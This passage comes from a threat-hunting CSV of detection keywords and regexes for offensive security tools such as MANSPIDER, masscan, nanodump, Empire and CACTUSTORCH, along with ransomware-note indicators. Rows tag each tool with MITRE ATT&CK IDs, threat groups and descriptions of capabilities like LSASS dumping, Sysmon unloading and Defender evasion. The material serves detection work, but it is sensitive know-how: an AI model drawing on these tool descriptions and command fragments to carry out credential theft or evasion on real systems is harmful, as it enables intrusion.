Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","0","N/A","N/A","8","10","1117","138","2024-07-18T06:14:04Z","2020-03-18T13:27:20Z","51645" "*manspider --threads * -d * -u * -H * --content admin*",".{0,1000}manspider\s\-\-threads\s.{0,1000}\s\-d\s.{0,1000}\s\-u\s.{0,1000}\s\-H\s.{0,1000}\s\-\-content\sadmin.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","51646" "*manspider*--loot-dir*",".{0,1000}manspider.{0,1000}\-\-loot\-dir.{0,1000}","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","0","N/A","N/A","8","10","1117","138","2024-07-18T06:14:04Z","2020-03-18T13:27:20Z","51647" "*manspider*--sharenames*",".{0,1000}manspider.{0,1000}\-\-sharenames.{0,1000}","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. 
Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","0","N/A","N/A","8","10","1117","138","2024-07-18T06:14:04Z","2020-03-18T13:27:20Z","51648" "*manspider.py*",".{0,1000}manspider\.py.{0,1000}","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","1","N/A","N/A","8","10","1117","138","2024-07-18T06:14:04Z","2020-03-18T13:27:20Z","51649" "*manspider.spiderling*",".{0,1000}manspider\.spiderling.{0,1000}","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","0","N/A","N/A","8","10","1117","138","2024-07-18T06:14:04Z","2020-03-18T13:27:20Z","51650" "*manspider_scan*",".{0,1000}manspider_scan.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","51651" "*MANSPIDER-master*",".{0,1000}MANSPIDER\-master.{0,1000}","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. 
Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","1","N/A","N/A","8","10","1117","138","2024-07-18T06:14:04Z","2020-03-18T13:27:20Z","51652" "*map_payload_dll*",".{0,1000}map_payload_dll.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","Dispossessor","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","10","1918","249","2024-09-17T22:58:11Z","2021-11-10T18:28:15Z","51654" "*map-get-tls-alternative-names *",".{0,1000}map\-get\-tls\-alternative\-names\s.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","N/A","7","1","95","10","2025-02-03T12:05:52Z","2021-11-15T13:40:56Z","51655" "*mapper_cve_exploit.py*",".{0,1000}mapper_cve_exploit\.py.{0,1000}","offensive_tool_keyword","Xerror","fully automated pentesting tool","T1083 - T1069 - T1204 - T1059 - T1078","TA0007 - TA0005 - TA0002 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Chudry/Xerror","1","1","N/A","N/A","N/A","6","509","110","2022-12-08T04:33:03Z","2019-08-16T21:20:52Z","51656" "*MARY.SWANN@PROTONMAIL.COM*",".{0,1000}MARY\.SWANN\@PROTONMAIL\.COM.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","#email","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","51657" "*masky_dump*",".{0,1000}masky_dump.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration 
and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","51658" "*masscan -c *",".{0,1000}masscan\s\-c\s.{0,1000}","offensive_tool_keyword","masscan","TCP port scanner. spews SYN packets asynchronously. scanning entire Internet in under 5 minutes.","T1046","TA0007","N/A","Black Basta - Unit 29155 - Akira - EMBER BEAR","Reconnaissance","https://github.com/robertdavidgraham/masscan","1","0","#linux","N/A","N/A","10","24345","3118","2024-12-13T12:22:18Z","2013-07-28T05:35:33Z","51659" "*masscan failed with error: *",".{0,1000}masscan\sfailed\swith\serror\:\s.{0,1000}","offensive_tool_keyword","smbsr","Lookup for interesting stuff in SMB shares","T1135","TA0001 - TA0007","N/A","N/A","Discovery","https://github.com/oldboy21/SMBSR","1","0","N/A","N/A","7","2","149","23","2023-06-16T14:35:30Z","2021-11-10T16:55:52Z","51660" "*masscan --nmap*",".{0,1000}masscan\s\-\-nmap.{0,1000}","offensive_tool_keyword","masscan","TCP port scanner. spews SYN packets asynchronously. scanning entire Internet in under 5 minutes.","T1046","TA0007","N/A","Black Basta - Unit 29155 - Akira - EMBER BEAR","Reconnaissance","https://github.com/robertdavidgraham/masscan","1","0","#linux","N/A","N/A","10","24345","3118","2024-12-13T12:22:18Z","2013-07-28T05:35:33Z","51661" "*masscan -p*",".{0,1000}masscan\s\-p.{0,1000}","offensive_tool_keyword","masscan","TCP port scanner. spews SYN packets asynchronously. 
scanning entire Internet in under 5 minutes.","T1046","TA0007","N/A","Black Basta - Unit 29155 - Akira - EMBER BEAR","Reconnaissance","https://github.com/robertdavidgraham/masscan","1","0","#linux","N/A","N/A","10","24345","3118","2024-12-13T12:22:18Z","2013-07-28T05:35:33Z","51662" "*masscan* -p*",".{0,1000}masscan.{0,1000}\s\s\-p.{0,1000}","offensive_tool_keyword","masscan","TCP port scanner. spews SYN packets asynchronously. scanning entire Internet in under 5 minutes.","T1046","TA0007","N/A","Black Basta - Unit 29155 - Akira - EMBER BEAR","Reconnaissance","https://github.com/robertdavidgraham/masscan","1","0","#linux","N/A","N/A","10","24345","3118","2024-12-13T12:22:18Z","2013-07-28T05:35:33Z","51663" "*masscan.exe *",".{0,1000}masscan\.exe\s.{0,1000}","offensive_tool_keyword","masscan","TCP port scanner. spews SYN packets asynchronously. scanning entire Internet in under 5 minutes.","T1046","TA0007","N/A","Black Basta - Unit 29155 - Akira - EMBER BEAR","Reconnaissance","https://github.com/robertdavidgraham/masscan","1","0","N/A","N/A","N/A","10","24345","3118","2024-12-13T12:22:18Z","2013-07-28T05:35:33Z","51664" "*massdns -r *.txt*",".{0,1000}massdns\s\-r\s.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","N/A","7","1","95","10","2025-02-03T12:05:52Z","2021-11-15T13:40:56Z","51665" "*mastadonster@onionmail.org*",".{0,1000}mastadonster\@onionmail\.org.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","#email","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","51666" "*master/bootkit/src*",".{0,1000}master\/bootkit\/src.{0,1000}","offensive_tool_keyword","bootkit-rs","Rusty Bootkit - Windows UEFI 
Bootkit in Rust (Codename: RedLotus)","T1542.004 - T1067.002 - T1012 - T1053.005 - T1057","TA0002 - TA0040 - TA0003 - TA0001","N/A","N/A","Defense Evasion","https://github.com/memN0ps/bootkit-rs","1","1","N/A","N/A","N/A","6","528","67","2023-09-12T07:23:15Z","2023-04-11T03:53:15Z","51667" "*master/EncryptedZIP*",".{0,1000}master\/EncryptedZIP.{0,1000}","offensive_tool_keyword","EncryptedZIP","Compresses a directory or file and then encrypts the ZIP file with a supplied key using AES256 CFB. This assembly also clears the key out of memory using RtlZeroMemory","T1564.001 - T1027 - T1214.001","TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/EncryptedZIP","1","1","N/A","N/A","10","10","1416","250","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z","51668" "*master/HookDetector*",".{0,1000}master\/HookDetector.{0,1000}","offensive_tool_keyword","HookDetector","Detects hooked Native API functions in the current process indicating the presence of EDR","T1055.012 - T1082 - T1057","TA0007 - TA0003","N/A","N/A","Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/HookDetector","1","1","N/A","N/A","10","10","1416","250","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z","51669" "*master/ImplantSSP/*",".{0,1000}master\/ImplantSSP\/.{0,1000}","offensive_tool_keyword","ImplantSSP","Installs a user-supplied Security Support Provider (SSP) DLL on the system which will be loaded by LSA on system start","T1547.008 - T1073.001 - T1055.001","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/matterpreter/OffensiveCSharp/tree/master/ImplantSSP","1","1","N/A","N/A","10","10","1416","250","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z","51670" "*master/SwampThing*",".{0,1000}master\/SwampThing.{0,1000}","offensive_tool_keyword","SwampThing","SwampThing lets you to spoof process command line args (x32/64). 
Essentially you create a process in a suspended state - rewrite the PEB - resume and finally revert the PEB. The end result is that logging infrastructure will record the fake command line args instead of the real ones","T1036.005 - T1564.002","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/FuzzySecurity/Sharp-Suite/tree/master/SwampThing","1","1","N/A","N/A","N/A","10","1131","203","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z","51671" "*master/UnquotedPath*",".{0,1000}master\/UnquotedPath.{0,1000}","offensive_tool_keyword","UnquotedPath","Outputs a list of unquoted service paths that aren't in System32/SysWow64 to plant a PE into","T1543.003 - T1036.005 - T1057","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/matterpreter/OffensiveCSharp/tree/master/UnquotedPath","1","1","N/A","N/A","10","10","1416","250","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z","51672" "*MatheuZSecurity/D3m0n1z3dShell*",".{0,1000}MatheuZSecurity\/D3m0n1z3dShell.{0,1000}","offensive_tool_keyword","D3m0n1z3dShell","Demonized Shell is an Advanced Tool for persistence in linux","T1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037","TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/MatheuZSecurity/D3m0n1z3dShell","1","1","#linux","N/A","10","4","373","54","2025-01-05T13:56:51Z","2023-05-30T02:30:47Z","51676" "*matterpreter/DefenderCheck*",".{0,1000}matterpreter\/DefenderCheck.{0,1000}","offensive_tool_keyword","DefenderCheck","Identifies the bytes that Microsoft Defender flags on","T1059.001 - T1059.005 - T1027.002 - T1070.004","TA0002 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/ThreatCheck","1","1","N/A","N/A","N/A","10","1185","143","2024-06-01T16:46:57Z","2020-10-08T11:22:26Z","51678" 
"*matterpreter/Shhmon*",".{0,1000}matterpreter\/Shhmon.{0,1000}","offensive_tool_keyword","shhmon","Neutering Sysmon via driver unload","T1518.001 ","TA0007","N/A","N/A","Defense Evasion","https://github.com/matterpreter/Shhmon","1","1","N/A","N/A","N/A","3","228","37","2022-10-13T16:56:41Z","2019-09-12T14:13:19Z","51679" "*MattKeeley/Spoofy*",".{0,1000}MattKeeley\/Spoofy.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","N/A","7","1","95","10","2025-02-03T12:05:52Z","2021-11-15T13:40:56Z","51680" "*MayankPandey01/Jira-Lens*",".{0,1000}MayankPandey01\/Jira\-Lens.{0,1000}","offensive_tool_keyword","Jira-Lens","Fast and customizable vulnerability scanner For JIRA written in Python","T1083 - T1065 - T1204 - T1087 - T1203","TA0007 - TA0005 - TA0001","N/A","N/A","Reconnaissance","https://github.com/MayankPandey01/Jira-Lens","1","1","N/A","N/A","N/A","4","318","52","2024-12-31T20:06:51Z","2021-11-14T18:37:47Z","51681" "*Mayyhem/Maestro*",".{0,1000}Mayyhem\/Maestro.{0,1000}","offensive_tool_keyword","Maestro","Maestro is a post-exploitation tool that simplifies interaction with Intune/EntraID from a C2 agent on a user's workstation bypassing the need for user password knowledge - token manipulation or Azure authentication processes","T1550.004 - T1078 - T1087 - T1071 - T1102","TA0006 - TA0003 - TA0005 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/Mayyhem/Maestro","1","1","N/A","behavior detections opportunities here https://posts.specterops.io/requesting-azure-ad-request-tokens-on-azure-ad-joined-machines-for-browser-sso-2b0409caad30","9","4","333","33","2025-02-11T23:02:00Z","2024-01-15T18:45:50Z","51682" "*Mayyhem/SharpSCCM*",".{0,1000}Mayyhem\/SharpSCCM.{0,1000}","offensive_tool_keyword","SharpSCCM","SharpSCCM is a post-exploitation tool designed to leverage Microsoft Endpoint 
Configuration Manager (a.k.a. ConfigMgr. formerly SCCM) for Lateral Movement and credential gathering without requiring access to the SCCM administration console GUI","T1078 - T1077 - T1547.001 - T1021.001 - T1087 - T1555.003","TA0008 - TA0006 - TA0003 - TA0011","N/A","N/A","Lateral Movement","https://github.com/Mayyhem/SharpSCCM/","1","1","N/A","N/A","10","7","626","94","2024-09-16T14:57:49Z","2021-08-19T05:09:19Z","51683" "*Mazars-Tech/AD_Miner*",".{0,1000}Mazars\-Tech\/AD_Miner.{0,1000}","offensive_tool_keyword","AD_Miner","AD Miner is an Active Directory audit tool that leverages cypher queries to crunch data from the #Bloodhound graph database to uncover security weaknesses","T1087.002 - T1069 - T1018 - T1595","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/Mazars-Tech/AD_Miner","1","1","N/A","AD Enumeration","7","10","1290","131","2025-03-12T10:53:09Z","2023-09-26T12:36:59Z","51684" "*mazedecrypt.top*",".{0,1000}mazedecrypt\.top.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","51686" "*mblogci3rudehaagbryjznltdp33ojwzkq6hn2pckvjq33rycmzczpid.onion*",".{0,1000}mblogci3rudehaagbryjznltdp33ojwzkq6hn2pckvjq33rycmzczpid\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","51687" "*mbrg/power-pwn*",".{0,1000}mbrg\/power\-pwn.{0,1000}","offensive_tool_keyword","power-pwn","An offensive and defensive security toolset for Microsoft 365 Power Platform","T1078 - T1078.004 - T1136 - T1136.001 - T1021 - T1021.003 - T1114 - T1114.002","TA0003 - TA0004 - TA0005 - 
TA0001","N/A","N/A","Exploitation tool","https://github.com/mbrg/power-pwn","1","1","N/A","N/A","10","10","939","100","2025-03-20T08:54:43Z","2022-06-14T11:40:21Z","51688" "*mbrlkbtq5jonaqkurjwmxftytyn2ethqvbxfu4rgjbkkknndqwae6byd.onion*",".{0,1000}mbrlkbtq5jonaqkurjwmxftytyn2ethqvbxfu4rgjbkkknndqwae6byd\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","51689" "*mcafee_epo2john.py*",".{0,1000}mcafee_epo2john\.py.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","51690" "*McpManagementPotato.*",".{0,1000}McpManagementPotato\..{0,1000}","offensive_tool_keyword","DCOMPotato","Service DCOM Object and SeImpersonatePrivilege abuse.","T1548.002 - T1134.002","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/zcgonvh/DCOMPotato","1","1","N/A","N/A","10","4","356","48","2022-12-09T01:57:53Z","2022-12-08T14:56:13Z","51691" "*md c:\chaos-container*",".{0,1000}md\sc\:\\chaos\-container.{0,1000}","offensive_tool_keyword","chaos","CHAOS is a free and open-source Remote Administration Tool that allow generate binaries to control remote operating systems","T1105 - T1059 - T1021 - T1041 - T1569.002 - T1573","TA0002 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/tiagorlampert/CHAOS","1","0","N/A","N/A","10","10","2483","541","2024-10-26T18:02:45Z","2017-07-11T06:54:56Z","51693" 
"*md.mirrors.hacktegic.com/blackarch/*/os/*",".{0,1000}md\.mirrors\.hacktegic\.com\/blackarch\/.{0,1000}\/os\/.{0,1000}","offensive_tool_keyword","blackarch","offensive distribution - url used by the OS for updates","T1071.001 - T1105","TA0009","N/A","N/A","Exploitation OS","https://github.com/BlackArch/blackarch","1","1","N/A","N/A","10","10","2969","595","2025-04-22T06:14:44Z","2012-08-16T16:03:43Z","51694" "*Md4-128.unverified.test-vectors.txt*",".{0,1000}Md4\-128\.unverified\.test\-vectors\.txt.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","51695" "*Md5-128.unverified.test-vectors.txt*",".{0,1000}Md5\-128\.unverified\.test\-vectors\.txt.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","51696" "*mdavis332/DomainPasswordSpray*",".{0,1000}mdavis332\/DomainPasswordSpray.{0,1000}","offensive_tool_keyword","DomainPasswordSpray","DomainPasswordSpray is a tool written in PowerShell to perform a password spray attack against users of a domain.","T1110.001 - T1110.003","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/DomainPasswordSpray","1","0","N/A","N/A","10","10","1865","388","2024-07-11T18:18:57Z","2016-10-04T23:37:37Z","51697" "*MDE_Enum /local /asr*",".{0,1000}MDE_Enum\s\/local\s\/asr.{0,1000}","offensive_tool_keyword","MDE_Enum","extract and display detailed information about Windows Defender exclusions and Attack Surface Reduction (ASR) rules","T1070.006","TA0005 - TA0007 - 
TA0009","N/A","N/A","Discovery","https://github.com/0xsp-SRD/MDE_Enum","1","0","N/A","N/A","8","2","198","18","2024-06-10T18:40:27Z","2024-06-06T15:54:44Z","51698" "*MDE_Enum /local /paths*",".{0,1000}MDE_Enum\s\/local\s\/paths.{0,1000}","offensive_tool_keyword","MDE_Enum","extract and display detailed information about Windows Defender exclusions and Attack Surface Reduction (ASR) rules","T1070.006","TA0005 - TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/0xsp-SRD/MDE_Enum","1","0","N/A","N/A","8","2","198","18","2024-06-10T18:40:27Z","2024-06-06T15:54:44Z","51699" "*MDExclusionParser-main*",".{0,1000}MDExclusionParser\-main.{0,1000}","offensive_tool_keyword","MDExclusionParser","PowerShell script to quickly scan Event Log ID 5007 and 1121 for published Windows Defender Exclusions and Attack Surface Reduction (ASR) rule configuration.","T1562.001","TA0005 - TA0007","N/A","N/A","Defense Evasion","https://github.com/ViziosDe/MDExclusionParser","1","1","N/A","N/A","5","1","6","1","2024-06-12T14:17:08Z","2024-06-12T11:56:07Z","51700" "*mDNSSpoofer*",".{0,1000}mDNSSpoofer.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","51702" "*mdornseif/DeNiSe*",".{0,1000}mdornseif\/DeNiSe.{0,1000}","offensive_tool_keyword","DeNiSe","DeNiSe is a proof of concept for tunneling TCP over DNS in Python","T1071.004 - T1048.003","TA0011 - TA0010 - TA0001","N/A","N/A","C2","https://github.com/mdornseif/DeNiSe","1","1","N/A","N/A","10","10","28","13","2021-12-17T18:03:33Z","2010-01-15T07:43:14Z","51703" "*MDSDLL_x64.dll*",".{0,1000}MDSDLL_x64\.dll.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies 
commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","51704" "*MDSDLL_x86.dll*",".{0,1000}MDSDLL_x86\.dll.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","51705" "*mdsecactivebreach/CACTUSTORCH*",".{0,1000}mdsecactivebreach\/CACTUSTORCH.{0,1000}","offensive_tool_keyword","CACTUSTORCH","A JavaScript and VBScript shellcode launcher. 
This will spawn a 32 bit version of the binary specified and inject shellcode into it.","T1055.011 - T1059.005 - T1059.007","TA0002 - TA0005","N/A","APT32","Exploitation tool","https://github.com/mdsecactivebreach/CACTUSTORCH","1","1","N/A","N/A","8","10","1006","227","2018-07-03T06:47:36Z","2017-07-04T10:20:34Z","51706" "*mdsecactivebreach/CACTUSTORCH*",".{0,1000}mdsecactivebreach\/CACTUSTORCH.{0,1000}","offensive_tool_keyword","cobaltstrike","CACTUSTORCH: Payload Generation for Adversary Simulations","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 
Sandworm","C2","https://github.com/mdsecactivebreach/CACTUSTORCH","1","1","N/A","N/A","10","10","1006","227","2018-07-03T06:47:36Z","2017-07-04T10:20:34Z","51707" "*mdsecactivebreach/DragonCastle*",".{0,1000}mdsecactivebreach\/DragonCastle.{0,1000}","offensive_tool_keyword","DragonCastle","A PoC that combines AutodialDLL Lateral Movement technique and SSP to scrape NTLM hashes from LSASS process.","T1003 - T1547.005 - T1055 - T1557","TA0008 - TA0006","N/A","N/A","Credential Access","https://github.com/mdsecactivebreach/DragonCastle","1","1","N/A","N/A","10","3","298","38","2022-10-26T10:19:55Z","2022-10-26T10:18:37Z","51708" "*mdsecactivebreach/Farmer*",".{0,1000}mdsecactivebreach\/Farmer.{0,1000}","offensive_tool_keyword","Farmer","Farmer is a project for collecting NetNTLM hashes in a Windows domain. Farmer achieves this by creating a local WebDAV server that causes the WebDAV Mini Redirector to authenticate from any connecting clients.","T1557.001 - T1056.004 - T1078.003","TA0006 - TA0004 - TA0001","N/A","N/A","Credential Access","https://github.com/mdsecactivebreach/Farmer","1","1","N/A","N/A","10","4","379","61","2021-04-28T15:27:24Z","2021-02-22T14:32:29Z","51709" "*mdsecactivebreach/SharpShooter*",".{0,1000}mdsecactivebreach\/SharpShooter.{0,1000}","offensive_tool_keyword","SharpShooter","Payload Generation Framework","T1027 - T1059","TA0042","N/A","N/A","Resource Development","https://github.com/mdsecactivebreach/SharpShooter","1","0","N/A","N/A","10","10","1859","361","2024-08-21T12:09:54Z","2018-03-06T20:04:20Z","51710" "*mdsecactivebreach/WMIPersistence*",".{0,1000}mdsecactivebreach\/WMIPersistence.{0,1000}","offensive_tool_keyword","WMIPersistence","An example of how to perform WMI Event Subscription persistence using C#","T1547.008 - T1084 - T1053 - T1059.003","TA0003 - TA0004 - 
